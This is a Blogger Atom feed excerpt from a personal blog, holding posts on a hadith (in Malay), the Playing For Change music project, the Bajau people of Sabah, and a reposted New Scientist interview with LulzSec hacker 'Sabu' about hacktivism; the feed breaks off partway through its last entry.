<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7306732139129025494</id><updated>2012-02-07T21:01:20.706+08:00</updated><category term='Penglipur Lara'/><category term='LostSoul'/><category term='Islam'/><category term='uDc'/><category term='Incident Management'/><category term='Cloud Computing'/><category term='Standards'/><category term='Procedure'/><category term='PeriBajau'/><category term='Entertainment'/><category term='Project'/><category term='Book'/><category term='Exploit'/><category term='Security'/><category term='News'/><category term='OSX86'/><title type='text'>Shaolin Integer a.k.a Slash The Underground</title><subtitle type='html'>Slash The Underground was a name that given to me by my linux guru (burn/lordburn). But most of my friends called me 'slash' or nullbyte, which is a nickname for me. It's short, clever, derogatory and sometimes considered desirable, symbolising a form of acceptance, but can often be a form of ridicule.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default?start-index=101&amp;max-results=100'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>123</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1140158601583516544</id><published>2012-02-07T20:48:00.001+08:00</published><updated>2012-02-07T21:01:20.714+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Islam'/><title type='text'>5 Sebelum 5</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-17X7d4rJ7GI/TzEgWzQZIRI/AAAAAAAAAsY/lpifMi31pek/s1600/azhar+idrus+24+Mac+2011.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-17X7d4rJ7GI/TzEgWzQZIRI/AAAAAAAAAsY/lpifMi31pek/s200/azhar+idrus+24+Mac+2011.jpg" width="140" /&gt;&lt;/a&gt;&lt;/div&gt;Rasulullah SAW bersabda yang bermaksud: "Rebut lima perkara sebelum  datang lima perkara. Masa sihat sebelum sakit, kaya sebelum miskin,  lapang sebelum sibuk, muda sebelum tua dan hidup sebelum mati." (Hadis  riwayat al-Hakim dan al-Baihaqi)&lt;br /&gt;&lt;br /&gt;Janganlah bertangguh-tangguh dalam berbuat kebaikan dan rebutlah 5 perkara sebelum datangnya 5 perkara.&lt;br /&gt;&lt;br /&gt;Beribadatlah, dan lakukanlah ibadat sunat disamping ibadat fardhu semasa sihat sebelum datangnya kesakitan,&lt;br /&gt;&lt;br /&gt;Bersedekahlah semasa masih kaya (berharta) sebelum ditimpa kemiskinan.&lt;br /&gt;&lt;br /&gt;Berzikirlah  sewaktu masih mempunyai kelapangan sebelum dilanda kesibukan, misalnya  di waktu pagi sebelum melakukan kerja-kerja harian dan di waktu petang  setelah selesai bekerja.&lt;br /&gt;&lt;br /&gt;Carilah keperluan dunia dan akhirat  semasa masih muda dan mempunyai kekuatan tenaga sebelum datangnya tua  dan tidak mempunyai kekuatan.&lt;br /&gt;&lt;br /&gt;Beramallah di sini (semasa berada  di dunia) semasa hidup kerana ia berguna selepas kematian nanti (semasa  di akhirat). Di sana kita tidak lagi dapat beramal.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://0.gvt0.com/vi/-KyK9tYNUsw/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-KyK9tYNUsw&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/-KyK9tYNUsw&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1140158601583516544?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1140158601583516544/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1140158601583516544' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1140158601583516544'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1140158601583516544'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2012/02/rasulullah-saw-bersabda-yang-bermaksud.html' title='5 Sebelum 5'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-17X7d4rJ7GI/TzEgWzQZIRI/AAAAAAAAAsY/lpifMi31pek/s72-c/azhar+idrus+24+Mac+2011.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6173852212152892496</id><published>2012-01-23T14:32:00.001+08:00</published><updated>2012-01-23T14:55:07.583+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LostSoul'/><title type='text'>Playing For Change</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4c4ia5JfwBM/Txz9g-oIdEI/AAAAAAAAArM/V71nlNP0FY0/s1600/playingforchange.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="106" src="http://2.bp.blogspot.com/-4c4ia5JfwBM/Txz9g-oIdEI/AAAAAAAAArM/V71nlNP0FY0/s200/playingforchange.gif" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Playing for Change is a multimedia movement created to inspire, connect,  and bring peace to the world through music. The idea for this project  arose from a common belief that music has the power to break down  boundaries and overcome distances between people. No matter whether  people come from different geographic, political, economic, spiritual or  ideological backgrounds, music has the universal power to transcend and  unite us as one human race. And with this truth firmly fixed in our  minds, we set out to share it with the world. Playing For Change also created a separate &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Non-profit_organization" title="Non-profit organization"&gt;non-profit organization&lt;/a&gt; called the Playing For Change Foundation which builds music schools for children around the world.&lt;br /&gt;&lt;br /&gt;The project started in &lt;a href="http://en.wikipedia.org/wiki/2004" title="2004"&gt;2004&lt;/a&gt;  with the organization's self described goal to "inspire, connect, and  bring peace to the world through music". The creators of the project,  Mark Johnson and Enzo Buono, traveled around the world to places such as  &lt;a href="http://en.wikipedia.org/wiki/New_Orleans" title="New Orleans"&gt;New Orleans&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Barcelona" title="Barcelona"&gt;Barcelona&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/South_Africa" title="South Africa"&gt;South Africa&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/India" title="India"&gt;India&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Nepal" title="Nepal"&gt;Nepal&lt;/a&gt;, the &lt;a href="http://en.wikipedia.org/wiki/Middle_East" title="Middle East"&gt;Middle East&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Ireland" title="Ireland"&gt;Ireland&lt;/a&gt;.  Using mobile recording equipment, the duo recorded local musicians  performing the same song, interpreted into their own style. Among the  artists participating, or openly involved in the project, include &lt;a href="http://en.wikipedia.org/wiki/Vusi_Mahlasela" title="Vusi Mahlasela"&gt;Vusi Mahlasela&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Louis_Mhlanga" title="Louis Mhlanga"&gt;Louis Mhlanga&lt;/a&gt;, &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Clarence_Bekker" title="Clarence Bekker"&gt;Clarence Bekker&lt;/a&gt;, &lt;a class="new" href="http://en.wikipedia.org/w/index.php?title=Tal_Ben_Ari_%28Tula%29&amp;amp;action=edit&amp;amp;redlink=1" title="Tal Ben Ari (Tula) (page does not exist)"&gt;Tal Ben Ari (Tula)&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Bono" title="Bono"&gt;Bono&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Keb%27_Mo%27" title="Keb' Mo'"&gt;Keb' Mo'&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/David_Broza" title="David Broza"&gt;David Broza&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Manu_Chao" title="Manu Chao"&gt;Manu Chao&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Grandpa_Elliott" title="Grandpa Elliott"&gt;Grandpa Elliott&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The project's first single "&lt;a href="http://en.wikipedia.org/wiki/Stand_by_Me_%28song%29" title="Stand by Me (song)"&gt;Stand by Me&lt;/a&gt;", began with a &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Santa_Monica" title="Santa Monica"&gt;Santa Monica&lt;/a&gt;  street performer named Roger Ridley (now deceased). The duo traveled  the world, recording more and more musicians. All of these versions were  considered for mixing a pastiche final version.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6173852212152892496?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.playingforchange.com/img/tmp/banner-278x150.gif' title='Playing For Change'/><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6173852212152892496/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6173852212152892496' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6173852212152892496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6173852212152892496'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2012/01/playing-for-change-is-multimedia.html' title='Playing For Change'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-4c4ia5JfwBM/Txz9g-oIdEI/AAAAAAAAArM/V71nlNP0FY0/s72-c/playingforchange.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5401666920889897</id><published>2011-07-23T23:05:00.001+08:00</published><updated>2011-07-23T23:07:24.973+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PeriBajau'/><title type='text'>Bajau Legacy - Pangentoman</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://1.gvt0.com/vi/lxg_6Dq9ft0/0.jpg" height="266" width="320"&gt;&lt;param name="movie" value="http://www.youtube.com/v/lxg_6Dq9ft0&amp;fs=1&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;embed width="320" height="266"  src="http://www.youtube.com/v/lxg_6Dq9ft0&amp;fs=1&amp;source=uds" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;The &lt;b&gt;Bajau&lt;/b&gt; or &lt;b&gt;Bajaw&lt;/b&gt; (pronounced &lt;span class="IPA" title="Pronunciation in the International Phonetic Alphabet (IPA)"&gt;&lt;a href="http://en.wikipedia.org/wiki/Wikipedia:IPA_for_English" title="Wikipedia:IPA for English"&gt;/ˈbædʒɔː/&lt;/a&gt;&lt;/span&gt; or &lt;span class="IPA" title="Pronunciation in IPA"&gt;&lt;a href="http://en.wikipedia.org/wiki/Wikipedia:IPA_for_English" title="Wikipedia:IPA for English"&gt;/ˈbɑːdʒaʊ/&lt;/a&gt;&lt;/span&gt;), also spelled &lt;b&gt;Bajao&lt;/b&gt;, &lt;b&gt;Badjau&lt;/b&gt;, &lt;b&gt;Badjaw&lt;/b&gt;, or &lt;b&gt;Badjao&lt;/b&gt;, are an &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Indigenous_peoples_of_Asia" title="Indigenous peoples of Asia"&gt;indigenous&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Ethnic_group" title="Ethnic group"&gt;ethnic group&lt;/a&gt; of &lt;a href="http://en.wikipedia.org/wiki/Maritime_Southeast_Asia" title="Maritime Southeast Asia"&gt;Maritime Southeast Asia&lt;/a&gt;. Due to escalated conflicts in their native &lt;a href="http://en.wikipedia.org/wiki/Sulu_Archipelago" title="Sulu Archipelago"&gt;Sulu Archipelago&lt;/a&gt;, and &lt;a href="http://en.wikipedia.org/wiki/Discrimination" title="Discrimination"&gt;discrimination&lt;/a&gt; suffered by &lt;a href="http://en.wikipedia.org/wiki/Moro_people" title="Moro people"&gt;Muslim groups&lt;/a&gt; in the &lt;a href="http://en.wikipedia.org/wiki/Philippines" title="Philippines"&gt;Philippines&lt;/a&gt; with regards to education and employment, most of the Bajau have migrated to neighboring &lt;a href="http://en.wikipedia.org/wiki/Malaysia" title="Malaysia"&gt;Malaysia&lt;/a&gt; over the course of 50 years. Currently they are the second largest ethnic group in the state of &lt;a href="http://en.wikipedia.org/wiki/Sabah" title="Sabah"&gt;Sabah&lt;/a&gt;, making up 13.4%&lt;sup class="reference" id="cite_ref-stats_0-1"&gt;&lt;a href="http://en.wikipedia.org/wiki/Bajau#cite_note-stats-0"&gt;[1]&lt;/a&gt;&lt;/sup&gt; of the total population. Groups of Bajau have also migrated to &lt;a href="http://en.wikipedia.org/wiki/Sulawesi" title="Sulawesi"&gt;Sulawesi&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Kalimantan" title="Kalimantan"&gt;Kalimantan&lt;/a&gt; in &lt;a href="http://en.wikipedia.org/wiki/Indonesia" title="Indonesia"&gt;Indonesia&lt;/a&gt;, although figures of their exact population are unknown.&lt;sup class="reference" id="cite_ref-orang_bajo_1-0"&gt;&lt;a href="http://en.wikipedia.org/wiki/Bajau#cite_note-orang_bajo-1"&gt;[2]&lt;/a&gt;&lt;/sup&gt; They were sometimes referred to as the &lt;a href="http://en.wikipedia.org/wiki/Sea_Gypsies" title="Sea Gypsies"&gt;Sea Gypsies&lt;/a&gt;,  although the term has been used to encompass a number of non-related  ethnic groups with similar traditional lifestyles, such as the &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Moken" title="Moken"&gt;Moken&lt;/a&gt; of the Burmese-Thai Mergui Archipelago and the &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Orang_Laut" title="Orang Laut"&gt;Orang Laut&lt;/a&gt;  of southeastern Sumatra and the Riau Islands of Indonesia. The modern  outward spread of the Bajau from older inhabited areas seems to have  been associated with the development of sea trade in &lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Holothuroidea" title="Holothuroidea"&gt;trepang&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/thumb/5/55/Badjao_kid_diving_for_coins.jpg/220px-Badjao_kid_diving_for_coins.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://upload.wikimedia.org/wikipedia/commons/thumb/5/55/Badjao_kid_diving_for_coins.jpg/220px-Badjao_kid_diving_for_coins.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;The origin of the word Bajau is not clear cut. It is generally accepted that these groups of people can be termed Bajau, though they never call themselves Bajau. Instead, they call themselves with the names of their tribes, usually the place they live or place of origin. They accept the term Bajau because they realize that they share some vocabulary and general genetic characteristic such as in having darker skin, although the Simunuls appear to be an exception in having fairer skin.&lt;br /&gt;&lt;br /&gt;British administrators in Sabah, labeled the Samah as Bajau and put Bajau in their birth certificates as their race. During their time in Malaysia, some have started labeling themselves as their ancestors called themselves, such as Simunul. For political reasons and to ensure easy access to the Malaysian special privileges granted to Malays, many have started calling themselves Malay. This is especially true for recent Filipino migrants.&lt;br /&gt;&lt;/span&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/thumb/1/18/Badjao_beggars.jpg/220px-Badjao_beggars.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;For most of their history, the Bajau have been a nomadic, seafaring people, living off the sea by trading&lt;/span&gt;&lt;span class="fullpost"&gt; and subsistence fishing.[5] The boat dwelling Bajau see themselves as non-aggressive people. They kept close to the shore by erecting houses on stilts, and traveled using lepa-lepa, handmade boats which many lived in.[5] Although historically originating from the southern Philippine coasts, Sabahan Sama legend narrates that they had originated from members of the royal guard of the Sultan of Johor, after the fall of the Malay Malacca empire, who settled along the east coast of Borneo after being driven there by storms. Another version narrates that they were escorting the Sultan's bride, but the bride was later kidnapped by the Sultan of Brunei. The fact that the Bajau-Sama languages belong to the Philippine branch of Malayo-Polynesian languages would substantiate the anthropological origins of the Bajau groups to be from the Philippines, and put the origin legends down to the historic Malay-centric influence of Bajau culture.&lt;br /&gt;&lt;br /&gt;However, there are traces that Sama people came from Riau Archipelago especially Lingga Island &lt;/span&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/thumb/1/18/Badjao_beggars.jpg/220px-Badjao_beggars.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="150" src="http://upload.wikimedia.org/wikipedia/commons/thumb/1/18/Badjao_beggars.jpg/220px-Badjao_beggars.jpg" width="200" /&gt;&lt;/a&gt;&lt;span class="fullpost"&gt;more than 300 years ago. It is believed by some that the migration process of Samah to North West Borneo took place more than 100 years earlier, starting from trade with the Empire of Brunei. (note connection to bride being sent from Johor to Sulu and then being kidnapped by the Prince of Brunei) With the fall of the legitimate Sultan of Johor due to being overthrown by Bugis immigrants, Sama people fled to the west coast of North Borneo where they felt safe to live under the protection of the Brunei Sultanate. That's why native Kadazan-Dusun call Sama people as "tuhun(people of) Sama" or "tulun(people of) Sama" in their dialects, the form of recognition before western civilization found Borneo. It was believed that Sama people are not from the royalty of the Sultanate, but loyal workers, craftsmen, boat builders and farmers that fled from cruelty of ethnic cleansing in chaotic Johor during aggression of the Bugis taking over the throne of Johor.&lt;br /&gt;&lt;br /&gt;Currently, there exists a huge settlement of Filipino Bajau in Pulau Gaya, off the Sabah coast. Many of them are illegal immigrants on the Malaysian island. With the island as a base, they frequently enter Sabah and find jobs as manual laborers.&lt;br /&gt;&lt;br /&gt;Discrimination of Bajau (particularly from the dominant Tausūg people who have historically viewed them as 'inferior' and less specifically from the Christian Filipinos)[6] and the continuing violence in Muslim Mindanao, have driven many Bajau to begging, or to migrate out of the country. They usually resettle in Malaysia and Indonesia, where they are less discriminated against.[4][7]&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5401666920889897?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5401666920889897/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5401666920889897' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5401666920889897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5401666920889897'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/07/bajau-legacy-pangentoman.html' title='Bajau Legacy - Pangentoman'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2088712880858457382</id><published>2011-07-05T10:17:00.004+08:00</published><updated>2011-07-05T10:20:44.981+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>New Scientist: Exclusive first interview with key LulzSec hacker</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://news.hitb.org/sites/default/files/styles/large/public/field/image/lulzsecurity-lg.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="185" src="http://news.hitb.org/sites/default/files/styles/large/public/field/image/lulzsecurity-lg.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;blockquote&gt;&lt;i&gt;It was early May when LulzSec's profile skyrocketed after a hack on the giant &lt;span style="color: red;"&gt;Sony corporation&lt;/span&gt;. LulzSec's name comes from Lulz, a corruption of LOL, often denoting laughter at the victim of a prank. For 50 days until it disbanded, the group's unique blend of humour, taunting and unapologetic data theft made it notorious. But knowing whether LulzSec was all about the "lulz" or if it owed more to its roots as part of Anonymous, the umbrella group of internet subculture and digital activism, was pure speculation. Until now.&lt;/i&gt;&lt;/blockquote&gt;&lt;b&gt;Who is "Sabu"?&lt;/b&gt;&lt;br /&gt;I'm a man who believes in human rights and exposing abuse and corruption. I generally care about people and their situations. I'm into politics and I try my best to stay on top of current events.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;We've seen you cast as everything from the greatest of heroes to the most evil of villains. How would you characterise yourself?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;It is hard for me to see myself as either. I am not trying to be a martyr. I'm not some cape-wearing hero, nor am I some supervillain trying to bring down the good guys. I'm just doing what I know how to do, and that is counter abuse.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;b&gt;What was your first experience with "hacktivism"?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;I got involved about 11 years ago when the US navy was using Vieques Island in Puerto Rico as a bombing range for exercises. There were lots of protests going on and I got involved in supporting the Puerto Rican government by disrupting communications. This whole situation was the first of its kind for the island and the people didn't expect things to go that route. Eventually, the US navy left Vieques.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How did you get involved with Anonymous?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;When I found out about what happened to Julian Assange, his arrest in the UK and so on, I found it absolutely absurd. So I got involved with Anonymous at that point.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What operation really inspired you and why?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Earlier this year, we got wind of the Tunisians' plight. Their government was blocking access to any website that reported anti-Tunisian information, including Tunileaks, the Tunisian version of Wikileaks, and any news sites discussing them.&lt;br /&gt;&lt;br /&gt;Tunisians came to us telling us about their desire to resist. "Disrupt the government of Tunisia," they said, and we did. We infiltrated the prime minister's site and defaced it externally. When Tunisia filtered off its internet from the world, it was the Tunisians who came online using dial-up and literally allowed us to use their connections to tunnel through to re-deface the prime minister's websites. It was the most impressive thing I've seen: a revolution coinciding both physically and online. It was the first time I had proof that what Anonymous was doing was real and it was working.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What would you like to say to people who say that you and other Antisec/Anonymous/LulzSec members are just troublemakers who have caused untold damage and loss to people for no apparent reason?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Would you rather your millions of emails, passwords, dox [personal information] and credit cards be exposed to the wild to be used by nefarious dealers of private information? Or would you rather have someone expose the hole and tell you your data was exploitable and that it's time to change your passwords? I'm sure we are seen as evil for exposing Sony and others, but at the end of the day, we motivated a giant to upgrade its security.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;But what about hacks that were done "for lulz"?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Yes, some hacks under LulzSec were done for the lulz, but there are lessons learned from them all. In 50 days, you saw how big and small companies were handling their user data incorrectly. You saw the US federal government vulnerable to security issues that could have just as easily been exploited by foreign governments. You saw affiliates of the US government handling sensitive emails and they themselves ignored the FBI's better practice manuals about password re-use.&lt;br /&gt;&lt;br /&gt;With the Public Broadcasting Service site, you saw the media vulnerable to fake articles. And yes, our Frontline hit [the group attacked the PBS's Frontline television programme website after perceived unfair treatment of Wikileaks] was political, but we also showed what could happen if an organisation were to hack 50 of the biggest media publications right now, online, and distribute a mass news article designed to blend in on each outlet's site. That kind of thing would cause some serious havoc. I mean, we're talking about the potential of crashing stocks or spreading damaging rumours. Everything we did had a duality: a lesson and some LOLs at the same time.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;When did you realize you had hit the point of no return?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;I was at the point of no return when I realised that I could make a change. Operation Tunisia was it for me. Then HBGary [a security firm attacked by LulzSec]. Now Antisec is the biggest movement in years, unifying all hackers and free thinkers across Anonymous and other groups. There's no going back.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How do you describe what Antisec is about?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Expose corruption. Expose censorship. Expose abuses. Assist our brothers and sisters during their operations in their own countries like the one we have going in Brazil now, Operation Brazil, which is about internet/information censorship. Expose these big multinational companies that have their hands in too much, that have too much power, and don't even take the time to secure your passwords and credit cards. And finally, discussion and education. We are not sitting idly by and letting our rights get thrashed. It's time to rise up now.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;So what would an Antisec "win" look like?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;There is no win. There's just change and education.&lt;br /&gt;&lt;br /&gt;The popularity of LulzSec and Anonymous has inspired many to follow in your footsteps. What words of wisdom do you have for them?&lt;br /&gt;&lt;br /&gt;Those who are with me in the fight do not have to be hackers. They can be reporters, artists, public speakers. This movement is about all of us uniting against corruption. But I don't ask anyone to take my risks. I don't want anyone to follow me down my path.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Are you afraid of being caught?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;There is no fear in my heart. I've passed the point of no return. I only hope that if I am stopped, the movement continues on the right path without me.&lt;br /&gt;&lt;br /&gt;Source: &lt;a href="http://www.newscientist.com/article/dn20649-exclusive-first-interview-with-key-lulzsec-hacker.html?full=true"&gt;New Scientist&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2088712880858457382?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2088712880858457382/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2088712880858457382' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2088712880858457382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2088712880858457382'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/07/new-scientist-exclusive-first-interview.html' title='New Scientist: Exclusive first interview with key LulzSec hacker'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 